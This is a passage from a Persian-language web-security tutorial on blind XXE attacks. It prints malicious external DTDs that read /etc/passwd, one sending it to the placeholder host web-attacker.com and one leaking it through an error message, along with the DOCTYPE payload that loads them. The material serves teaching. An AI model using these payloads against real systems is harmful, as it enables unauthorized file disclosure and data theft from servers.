#ffffff;\"><strong>&lt;!ENTITY % file SYSTEM &#8220;file:\/\/\/etc\/passwd&#8221;&gt; <\/strong><\/span><br \/><span style=\"color: #ffffff;\"><strong>&lt;!ENTITY % eval &#8220;&lt;!ENTITY &amp;#x25; exfiltrate SYSTEM &#8216;http:\/\/web-attacker.com\/?x=%file;&#8217;&gt;&#8221;&gt;<\/strong><\/span><br \/><span style=\"color: #ffffff;\"><strong>%eval;<\/strong><\/span><br \/><span style=\"color: #ffffff;\"><strong>%exfiltrate;<\/strong><\/span><\/p>\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-54fcc2e elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"54fcc2e\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-515b163\" data-id=\"515b163\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-6ad278d elementor-widget elementor-widget-text-editor\" data-id=\"6ad278d\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<p>\u0627\u06cc\u0646 DTD \u0645\u0631\u0627\u062d\u0644 \u0632\u06cc\u0631 \u0631\u0627 \u0627\u0646\u062c\u0627\u0645 \u0645\u06cc\u200c\u062f\u0647\u062f:<\/p><ul><li>\u06cc\u06a9 \u0627\u0646\u062a\u06cc\u062a\u06cc \u067e\u0627\u0631\u0627\u0645\u062a\u0631\u06cc XML \u0628\u0647 \u0646\u0627\u0645 file \u062a\u0639\u0631\u06cc\u0641 \u0645\u06cc\u200c\u06a9\u0646\u062f \u06a9\u0647 \u062d\u0627\u0648\u06cc \u0645\u062d\u062a\u0648\u06cc\u0627\u062a \u0641\u0627\u06cc\u0644 \/etc\/passwd \u0627\u0633\u062a.<\/li><li>\u06cc\u06a9 \u0627\u0646\u062a\u06cc\u062a\u06cc \u067e\u0627\u0631\u0627\u0645\u062a\u0631\u06cc XML \u0628\u0647 \u0646\u0627\u0645 eval \u062a\u0639\u0631\u06cc\u0641 \u0645\u06cc\u200c\u06a9\u0646\u062f\u060c \u06a9\u0647 \u062d\u0627\u0648\u06cc \u062a\u0639\u0631\u06cc\u0641 \u062f\u06cc\u0646\u0627\u0645\u06cc\u06a9* \u06cc\u06a9 \u0627\u0646\u062a\u06cc\u062a\u06cc \u067e\u0627\u0631\u0627\u0645\u062a\u0631\u06cc \u062f\u06cc\u06af\u0631 \u0628\u0647 \u0627\u0633\u0645 exfiltrate \u0627\u0633\u062a (\u0627\u0646\u062a\u06cc\u062a\u06cc &amp;#x25; \u0647\u0645\u0627\u0646 \u0639\u0644\u0627\u0645\u062a % \u0627\u0633\u062a\u061b \u0686\u0648\u0646 \u062f\u0627\u062e\u0644 \u0627\u0633\u062a\u0631\u06cc\u0646\u06af \u062f\u0627\u0631\u06cc\u0645 \u0627\u0632 \u0627\u06cc\u0646 \u0645\u062a\u0627\u06a9\u0627\u0631\u0627\u06a9\u062a\u0631 \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0645\u06cc\u200c\u06a9\u0646\u06cc\u0645\u060c \u0628\u0627\u06cc\u062f \u0628\u0647 \u062c\u0627\u06cc \u062a\u0627\u06cc\u067e \u0645\u0633\u062a\u0642\u06cc\u0645 \u0622\u0646\u060c \u0627\u0646\u062a\u06cc\u062a\u06cc \u0622\u0646 \u0631\u0627 \u0641\u0631\u0627\u062e\u0648\u0627\u0646\u06cc \u06a9\u0646\u06cc\u0645)\u200c. \u0632\u0645\u0627\u0646\u06cc \u06a9\u0647 \u0627\u0646\u062a\u06cc\u062a\u06cc exfiltrate \u0641\u0631\u0627\u062e\u0648\u0627\u0646\u06cc \u0634\u0648\u062f\u060c \u06cc\u06a9 \u0631\u06cc\u06a9\u0648\u0626\u0633\u062a HTTP \u0628\u0647 \u0648\u0628\u200c\u0633\u0631\u0648\u0631 \u0645\u0647\u0627\u062c\u0645 \u0645\u06cc\u200c\u0641\u0631\u0633\u062a\u062f. \u0627\u06cc\u0646 \u0631\u06cc\u06a9\u0648\u0626\u0633\u062a \u062d\u0627\u0648\u06cc \u0645\u0642\u062f\u0627\u0631 \u0627\u0646\u062a\u06cc\u062a\u06cc file \u0627\u0633\u062a \u06a9\u0647 \u0628\u0647 \u0635\u0648\u0631\u062a \u0645\u0633\u062a\u0642\u06cc\u0645 \u062f\u0631 \u0627\u0633\u062a\u0631\u06cc\u0646\u06af \u06a9\u0648\u0626\u0631\u06cc URL \u0622\u0645\u062f\u0647 \u0627\u0633\u062a\u061b \u06cc\u0639\u0646\u06cc \u0645\u062d\u062a\u0648\u0627\u06cc \u0641\u0627\u06cc\u0644 \/etc\/passwd \u06a9\u0647 \u0628\u0647 \u0639\u0646\u0648\u0627\u0646 \u0645\u0642\u062f\u0627\u0631 \u0627\u0646\u062a\u06cc\u062a\u06cc file \u062a\u0639\u0631\u06cc\u0641 \u0634\u062f\u0647 \u0628\u0648\u062f\u060c \u0628\u0647 \u0637\u0648\u0631 \u0645\u0633\u062a\u0642\u06cc\u0645 \u062f\u0627\u062e\u0644 URL \u0648 \u062f\u0631 \u0631\u06cc\u06a9\u0648\u0626\u0633\u062a HTTP \u0628\u0647 \u0633\u0631\u0648\u0631 \u0645\u0647\u0627\u062c\u0645 \u0627\u0631\u0633\u0627\u0644 \u0645\u06cc\u200c\u0634\u0648\u062f.<\/li><li>\u0627\u0632 \u0627\u0646\u062a\u06cc\u062a\u06cc eval \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0645\u06cc\u200c\u06a9\u0646\u062f\u060c \u06a9\u0647 \u0628\u0627\u0639\u062b \u0645\u06cc\u200c\u0634\u0648\u062f \u0627\u0646\u062a\u06cc\u062a\u06cc exfiltrate \u0628\u0647 \u0635\u0648\u0631\u062a \u062f\u06cc\u0646\u0627\u0645\u06cc\u06a9 \u062a\u0639\u0631\u06cc\u0641 \u0634\u0648\u062f.<\/li><li>\u0627\u0632 \u0627\u0646\u062a\u06cc\u062a\u06cc exfiltrate \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0645\u06cc\u200c\u06a9\u0646\u062f\u060c \u06a9\u0647 \u0648\u0642\u062a\u06cc \u0645\u0642\u062f\u0627\u0631 \u0622\u0646 \u062c\u0627\u06cc \u0622\u0646 \u0642\u0631\u0627\u0631 \u062f\u0627\u062f\u0647 \u0634\u0648\u062f\u060c URL \u062a\u0639\u06cc\u06cc\u0646\u200c\u0634\u062f\u0647 \u062f\u0631 \u06cc\u06a9 \u0631\u06cc\u06a9\u0648\u0626\u0633\u062a HTTP \u0627\u0631\u0633\u0627\u0644 \u0645\u06cc\u200c\u0634\u0648\u062f.<\/li><\/ul><p>\u0633\u067e\u0633 \u0645\u0647\u0627\u062c\u0645 \u0628\u0627\u06cc\u062f \u0627\u06cc\u0646 DTD \u0645\u062e\u0631\u0628 \u0631\u0627 \u0631\u0648\u06cc \u0633\u06cc\u0633\u062a\u0645\u06cc \u06a9\u0647 \u062a\u062d\u062a \u06a9\u0646\u062a\u0631\u0644 \u062e\u0648\u062f\u0634 \u0628\u0627\u0634\u062f \u0645\u06cc\u0632\u0628\u0627\u0646\u06cc \u06a9\u0646\u062f. \u0645\u0647\u0627\u062c\u0645 \u0645\u0639\u0645\u0648\u0644\u0627 \u0628\u0631\u0627\u06cc \u0627\u06cc\u0646 \u06a9\u0627\u0631 \u0641\u0627\u06cc\u0644 \u0631\u0627 \u0631\u0648\u06cc \u0648\u0628\u200c\u0633\u0631\u0648\u0631\u06cc \u0628\u0627\u0631\u06af\u0630\u0627\u0631\u06cc \u0645\u06cc\u200c\u06a9\u0646\u062f \u06a9\u0647 \u0645\u062a\u0639\u0644\u0642 \u0628\u0647 \u062e\u0648\u062f\u0634 \u0628\u0627\u0634\u062f. \u0628\u0631\u0627\u06cc \u0645\u062b\u0627\u0644 \u0645\u0647\u0627\u062c\u0645 \u0645\u0645\u06a9\u0646 \u0627\u0633\u062a \u0641\u0627\u06cc\u0644 DTD \u0645\u062e\u0631\u0628 \u0631\u0627 \u062f\u0631 \u0627\u06cc\u0646 URL \u0642\u0631\u0627\u0631 \u062f\u0647\u062f:<\/p>\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-6752094 elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"6752094\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-e4b5125\" data-id=\"e4b5125\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-3da4e17 elementor-widget elementor-widget-text-editor\" data-id=\"3da4e17\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<p dir=\"ltr\" style=\"text-align: left;\"><strong><span style=\"color: #ffffff;\">http:\/\/web-attacker.com\/malicious.dtd<\/span><\/strong><\/p>\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-13f46db elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"13f46db\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-d33f45d\" data-id=\"d33f45d\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-2274be7 elementor-widget elementor-widget-text-editor\" data-id=\"2274be7\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<p>\u062f\u0631 \u0646\u0647\u0627\u06cc\u062a \u0645\u0647\u0627\u062c\u0645 \u0628\u0627\u06cc\u062f \u067e\u06cc\u200c\u0644\u0648\u062f XXE \u0632\u06cc\u0631 \u0631\u0627 \u062f\u0631 \u0627\u067e\u0644\u06cc\u06a9\u06cc\u0634\u0646 \u0622\u0633\u06cc\u0628\u200c\u067e\u0630\u06cc\u0631 \u062b\u0628\u062a \u06a9\u0646\u062f:<\/p>\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-f069bf7 elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"f069bf7\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-e2db677\" data-id=\"e2db677\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-2a67047 elementor-widget elementor-widget-text-editor\" data-id=\"2a67047\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<p dir=\"ltr\" style=\"text-align: left;\"><strong><span style=\"color: #ffffff;\">&lt;!DOCTYPE foo [&lt;!ENTITY % xxe SYSTEM &#8220;http:\/\/web-attacker.com\/malicious.dtd&#8221;&gt; %xxe;]&gt;<\/span><\/strong><\/p>\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-0691c78 elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"0691c78\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-451ad75\" data-id=\"451ad75\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-7ee9187 elementor-widget elementor-widget-text-editor\" data-id=\"7ee9187\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t\u0627\u06cc\u0646 \u067e\u06cc\u200c\u0644\u0648\u062f XXE \u06cc\u06a9 \u0627\u0646\u062a\u06cc\u062a\u06cc \u067e\u0627\u0631\u0627\u0645\u062a\u0631\u06cc XML \u0628\u0647 \u0646\u0627\u0645 xxe \u062a\u0639\u0631\u06cc\u0641 \u0645\u06cc\u200c\u06a9\u0646\u062f \u0648 \u0633\u067e\u0633 \u0627\u0632 \u0627\u06cc\u0646 \u0627\u0646\u062a\u06cc\u062a\u06cc \u062f\u0627\u062e\u0644 \u062e\u0648\u062f DTD \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0645\u06cc\u200c\u06a9\u0646\u062f. \u0627\u06cc\u0646 \u06a9\u0627\u0631 \u0628\u0627\u0639\u062b \u0645\u06cc\u200c\u0634\u0648\u062f \u067e\u0627\u0631\u0633\u0631 XML \u0641\u0627\u06cc\u0644 DTD \u0627\u06a9\u0633\u062a\u0631\u0646\u0627\u0644 \u06cc\u0627 \u062e\u0627\u0631\u062c\u06cc \u0631\u0627 \u0627\u0632 \u0633\u0631\u0648\u0631 \u0645\u0647\u0627\u062c\u0645 \u062f\u0631\u06cc\u0627\u0641\u062a \u06a9\u0646\u062f \u0648 \u0622\u0646 \u0631\u0627 \u062a\u0641\u0633\u06cc\u0631 \u06a9\u0646\u062f. \u0633\u067e\u0633 \u0645\u0631\u0627\u062d\u0644\u06cc \u06a9\u0647 \u062f\u0631 \u0641\u0627\u06cc\u0644 DTD \u0645\u062e\u0631\u0628 \u062a\u0639\u0631\u06cc\u0641 \u0634\u062f\u0647 \u0628\u0648\u062f\u0646\u062f \u0627\u062c\u0631\u0627 \u0645\u06cc\u200c\u0634\u0648\u0646\u062f\u060c \u0648 \u0645\u062d\u062a\u0648\u06cc\u0627\u062a \u0641\u0627\u06cc\u0644 \/etc\/passwd \u0628\u0647 \u0633\u0631\u0648\u0631 \u0645\u0647\u0627\u062c\u0645 \u0627\u0646\u062a\u0642\u0627\u0644 \u067e\u06cc\u062f\u0627 \u0645\u06cc\u200c\u06a9\u0646\u0646\u062f.\n\n<strong>\u0646\u06a9\u062a\u0647:<\/strong> \u0627\u06cc\u0646 \u062a\u06a9\u0646\u06cc\u06a9 \u0645\u0645\u06a9\u0646 \u0627\u0633\u062a \u0628\u0631\u0627\u06cc \u0645\u062d\u062a\u0648\u0627\u0647\u0627\u06cc\u06cc \u062e\u0627\u0635\u06cc \u062f\u0631 \u0641\u0627\u06cc\u0644\u200c\u0647\u0627\u060c \u0628\u0631\u0627\u06cc \u0645\u062b\u0627\u0644 \u06a9\u0627\u0631\u0627\u06a9\u062a\u0631 newline \u0645\u0648\u062c\u0648\u062f \u062f\u0631 \u0641\u0627\u06cc\u0644 \/etc\/passwd\u060c \u06a9\u0627\u0631 \u0646\u06a9\u0646\u062f. \u062f\u0644\u06cc\u0644 \u0627\u06cc\u0646 \u0645\u0634\u06a9\u0644 \u0627\u06cc\u0646 \u0627\u0633\u062a \u06a9\u0647 \u0628\u0631\u062e\u06cc \u067e\u0627\u0631\u0633\u0631\u0647\u0627\u06cc XML\u060c \u0622\u062f\u0631\u0633 URL \u0631\u0627 \u06a9\u0647 \u062f\u0631 \u0627\u0646\u062a\u06cc\u062a\u06cc \u0627\u06a9\u0633\u062a\u0631\u0646\u0627\u0644 \u0642\u0631\u0627\u0631 \u062f\u0627\u0631\u062f \u0628\u0627 \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0627\u0632 \u06cc\u06a9 API \u062f\u0631\u06cc\u0627\u0641\u062a \u0645\u06cc\u200c\u06a9\u0646\u0646\u062f \u06a9\u0647 \u0628\u0631\u0631\u0633\u06cc \u0645\u06cc\u200c\u06a9\u0646\u0646\u062f \u06a9\u0627\u0631\u0627\u06a9\u062a\u0631\u0647\u0627\u06cc\u06cc \u06a9\u0647 \u062f\u0631 URL \u0622\u0645\u062f\u0647\u200c\u0627\u0646\u062f\u060c \u06a9\u0627\u0631\u0627\u06a9\u062a\u0631\u0647\u0627\u06cc \u0645\u062c\u0627\u0632 \u0628\u0627\u0634\u0646\u062f (\u062f\u0631 URL \u062e\u0637 \u062c\u062f\u06cc\u062f \u0646\u062f\u0627\u0631\u06cc\u0645!). \u062f\u0631 \u0686\u0646\u06cc\u0646 \u0645\u0648\u0627\u0642\u0639\u06cc\u060c \u0645\u0645\u06a9\u0646 \u0627\u0633\u062a \u0628\u062a\u0648\u0627\u0646\u06cc\u062f \u0628\u0647 \u062c\u0627\u06cc \u067e\u0631\u0648\u062a\u06a9\u0644 HTTP \u0627\u0632 \u067e\u0631\u0648\u062a\u06a9\u0644 FTP \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u06a9\u0646\u06cc\u062f. \u0628\u0639\u0636\u06cc \u0627\u0648\u0642\u0627\u062a \u0628\u0647 \u0637\u0648\u0631 \u06a9\u0644\u06cc \u0646\u0645\u06cc\u200c\u062a\u0648\u0627\u0646 \u062f\u0627\u062f\u0647\u200c\u0647\u0627\u06cc \u062d\u0627\u0648\u06cc \u06a9\u0627\u0631\u0627\u06a9\u062a\u0631 newline \u0631\u0627 \u0627\u0633\u062a\u062e\u0631\u0627\u062c \u06a9\u0631\u062f\u061b \u062f\u0631 \u0627\u06cc\u0646 \u0645\u0648\u0627\u0642\u0639 \u0645\u06cc\u200c\u062a\u0648\u0627\u0646 \u0641\u0627\u06cc\u0644 \u062f\u06cc\u06af\u0631\u06cc \u0645\u0627\u0646\u0646\u062f \/etc\/hostname \u0631\u0627 \u0647\u062f\u0641 \u0642\u0631\u0627\u0631 \u062f\u0627\u062f.\n<span style=\"font-size: 8pt;\"><strong>*\u062a\u0639\u0631\u06cc\u0641 \u062f\u06cc\u0646\u0627\u0645\u06cc\u06a9 \u0627\u0646\u062a\u06cc\u062a\u06cc \u06cc\u0639\u0646\u06cc \u0632\u0645\u0627\u0646\u06cc \u06a9\u0647 \u062a\u0639\u0631\u06cc\u0641 \u06cc\u06a9 \u0627\u0646\u062a\u06cc\u062a\u06cc\u060c \u0645\u0642\u062f\u0627\u0631 \u062a\u0639\u0631\u06cc\u0641\u200c\u0634\u062f\u0647 \u0628\u0631\u0627\u06cc \u06cc\u06a9 \u0627\u0646\u062a\u06cc\u062a\u06cc \u062f\u06cc\u06af\u0631 \u0628\u0627\u0634\u062f. \u0628\u0631\u0627\u06cc \u0645\u062b\u0627\u0644 \u0632\u0645\u0627\u0646\u06cc \u06a9\u0647 \u0627\u0646\u062a\u06cc\u062a\u06cc one \u0631\u0627 \u062a\u0639\u0631\u06cc\u0641 \u06a9\u0646\u06cc\u0645 \u0648 \u0645\u0642\u062f\u0627\u0631 \u0622\u0646 \u0631\u0627 \u062a\u0639\u0631\u06cc\u0641 \u0627\u0646\u062a\u06cc\u062a\u06cc two \u0642\u0631\u0627\u0631 \u062f\u0647\u06cc\u0645\u060c \u0647\u0646\u06af\u0627\u0645\u06cc \u06a9\u0647 &amp;one \u0631\u0627 \u0641\u0631\u0627\u062e\u0648\u0627\u0646\u06cc \u06a9\u0646\u06cc\u0645\u060c \u0627\u0646\u062a\u06cc\u062a\u06cc two \u062a\u0639\u0631\u06cc\u0641 \u0645\u06cc\u200c\u0634\u0648\u062f \u0648 \u067e\u0633 \u0627\u0632 \u0622\u0646 \u0645\u06cc\u200c\u062a\u0648\u0627\u0646\u06cc\u0645 &amp;two \u0631\u0627 \u0641\u0631\u0627\u062e\u0648\u0627\u0646\u06cc \u06a9\u0646\u06cc\u0645.<\/strong><\/span>\n<h4 id=\"err-msg\"><span style=\"font-size: 12pt;\">\u0627\u06a9\u0633\u067e\u0644\u0648\u06cc\u062a Blind XXE \u0628\u0631\u0627\u06cc \u062f\u0633\u062a\u06cc\u0627\u0628\u06cc \u0628\u0647 \u062f\u0627\u062f\u0647\u200c\u0647\u0627 \u0627\u0632 \u0637\u0631\u06cc\u0642 \u067e\u06cc\u0627\u0645\u200c\u0647\u0627\u06cc \u062e\u0637\u0627<\/span><\/h4>\n\u06cc\u06a9 \u0631\u0648\u06cc\u06a9\u0631\u062f \u062c\u0627\u06cc\u06af\u0632\u06cc\u0646 \u0628\u0631\u0627\u06cc \u0627\u06a9\u0633\u067e\u0644\u0648\u06cc\u062a Blind XXE\u060c \u0627\u06cc\u0646 \u0627\u0633\u062a \u06a9\u0647 \u06cc\u06a9 Parsing Error \u0627\u06cc\u062c\u0627\u062f \u06a9\u0646\u06cc\u0645 \u06a9\u0647 \u062f\u0631 \u0622\u0646 \u067e\u06cc\u0627\u0645 \u062e\u0637\u0627 \u062d\u0627\u0648\u06cc \u0627\u0637\u0644\u0627\u0639\u0627\u062a \u062d\u0633\u0627\u0633\u06cc \u0628\u0627\u0634\u062f \u06a9\u0647 \u0628\u0647 \u062f\u0646\u0628\u0627\u0644 \u062f\u0633\u062a\u06cc\u0627\u0628\u06cc \u0628\u0647 \u0622\u0646\u200c\u0647\u0627 \u0647\u0633\u062a\u06cc\u0645. \u0627\u06cc\u0646 \u0631\u0648\u06cc\u06a9\u0631\u062f \u0632\u0645\u0627\u0646\u06cc \u0645\u0648\u062b\u0631 \u0627\u0633\u062a \u06a9\u0647 \u0627\u067e\u0644\u06cc\u06a9\u06cc\u0634\u0646 \u067e\u06cc\u0627\u0645 \u062e\u0637\u0627 \u0631\u0627 \u0628\u0647 \u0647\u0645\u0631\u0627\u0647 \u067e\u0627\u0633\u062e \u062e\u0648\u062f \u0627\u0631\u0633\u0627\u0644 \u06a9\u0646\u062f.\n\u0634\u0645\u0627 \u0645\u06cc\u200c\u062a\u0648\u0627\u0646\u06cc\u062f \u0628\u0627 \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0627\u0632 \u06cc\u06a9 \u0641\u0627\u06cc\u0644 DTD \u062e\u0627\u0631\u062c\u06cc \u0645\u062e\u0631\u0628 \u2013 \u06a9\u0647 \u0631\u0648\u06cc \u0648\u0628\u200c\u0633\u0631\u0648\u0631 \u0645\u062a\u0639\u0644\u0642 \u0628\u0647 \u0634\u0645\u0627 \u0645\u06cc\u0632\u0628\u0627\u0646\u06cc \u0645\u06cc\u200c\u0634\u0648\u062f \u2013 \u06cc\u06a9 Parsing Error \u0627\u06cc\u062c\u0627\u062f \u06a9\u0646\u06cc\u062f \u06a9\u0647 \u062d\u0627\u0648\u06cc \u0645\u062d\u062a\u0648\u06cc\u0627\u062a \u0641\u0627\u06cc\u0644 \/etc\/passwd \u0628\u0627\u0634\u062f:\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-ee1adc1 elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"ee1adc1\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-c7d2357\" data-id=\"c7d2357\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-2d2bf00 elementor-widget elementor-widget-text-editor\" data-id=\"2d2bf00\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<p dir=\"ltr\" style=\"text-align: left;\"><strong><span style=\"color: #ffffff;\"><code class=\"language-unknown\"><\/code><\/span><\/strong><\/p><p dir=\"ltr\" style=\"text-align: left;\"><strong><span style=\"color: #ffffff;\">&lt;!ENTITY % file SYSTEM &#8220;file:\/\/\/etc\/passwd&#8221;&gt; <\/span><\/strong><br \/><strong><span style=\"color: #ffffff;\">&lt;!ENTITY % eval &#8220;&lt;!ENTITY &amp;#x25; error SYSTEM &#8216;file:\/\/\/nonexistent\/%file;&#8217;&gt;&#8221;&gt; <\/span><\/strong><br \/><strong><span style=\"color: #ffffff;\">%eval;<\/span><\/strong><br \/><strong><span style=\"color: #ffffff;\">%error;<\/span><\/strong><\/p>\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-b027b4c elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"b027b4c\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-a988989\" data-id=\"a988989\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-0c75c3d elementor-widget elementor-widget-text-editor\" data-id=\"0c75c3d\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<p>\u0627\u06cc\u0646 DTD \u0645\u0631\u0627\u062d\u0644 \u0632\u06cc\u0631 \u0631\u0627 \u0627\u0646\u062c\u0627\u0645 \u0645\u06cc\u200c\u062f\u0647\u062f:<\/p><ul><li>\u06cc\u06a9 \u0627\u0646\u062a\u06cc\u062a\u06cc \u067e\u0627\u0631\u0627\u0645\u062a\u0631\u06cc \u0628\u0647 \u0627\u0633\u0645 file \u062a\u0639\u0631\u06cc\u0641 \u0645\u06cc\u200c\u06a9\u0646\u062f\u060c \u06a9\u0647 \u062d\u0627\u0648\u06cc \u0645\u062d\u062a\u0648\u06cc\u0627\u062a \u0641\u0627\u06cc\u0644 \/etc\/passwd \u0627\u0633\u062a.<\/li><li>\u06cc\u06a9 \u0627\u0646\u062a\u06cc\u062a\u06cc \u067e\u0627\u0631\u0627\u0645\u062a\u0631\u06cc \u0628\u0647 \u0627\u0633\u0645 eval \u062a\u0639\u0631\u06cc\u0641 \u0645\u06cc\u200c\u06a9\u0646\u062f\u060c \u06a9\u0647 \u062d\u0627\u0648\u06cc \u062a\u0639\u0631\u06cc\u0641 \u062f\u06cc\u0646\u0627\u0645\u06cc\u06a9 \u06cc\u06a9 \u0627\u0646\u062a\u06cc\u062a\u06cc \u067e\u0627\u0631\u0627\u0645\u062a\u0631\u06cc \u062f\u06cc\u06af\u0631 \u0628\u0647 \u0646\u0627\u0645 error \u0627\u0633\u062a. \u0627\u0646\u062a\u06cc\u062a\u06cc error \u0647\u0646\u06af\u0627\u0645 \u0641\u0631\u0627\u062e\u0648\u0627\u0646\u06cc\u060c \u0633\u0639\u06cc \u0645\u06cc\u200c\u06a9\u0646\u062f \u0641\u0627\u06cc\u0644\u06cc \u0631\u0627 \u0628\u0627\u0631\u06af\u06cc\u0631\u06cc \u06a9\u0646\u062f \u06a9\u0647 \u0648\u062c\u0648\u062f \u062e\u0627\u0631\u062c\u06cc \u0646\u062f\u0627\u0631\u062f\u060c \u0648\u0644\u06cc \u0646\u0627\u0645 \u0627\u06cc\u0646 \u0641\u0627\u06cc\u0644 \u062d\u0627\u0648\u06cc \u0645\u0642\u062f\u0627\u0631 \u0627\u0646\u062a\u06cc\u062a\u06cc file (\u06cc\u0639\u0646\u06cc \u0645\u062d\u062a\u0648\u06cc\u0627\u062a \u0641\u0627\u06cc\u0644 \/etc\/passwd) \u0627\u0633\u062a. (\u0645\u0639\u0646\u0627\u06cc \u062a\u0639\u0631\u06cc\u0641 \u062f\u06cc\u0646\u0627\u0645\u06cc\u06a9 \u0631\u0627 \u062f\u0631 \u0628\u062e\u0634 \u0642\u0628\u0644 \u06af\u0641\u062a\u06cc\u0645).<\/li><li>\u0627\u0646\u062a\u06cc\u062a\u06cc eval \u0631\u0627 \u0641\u0631\u0627\u062e\u0648\u0627\u0646\u06cc 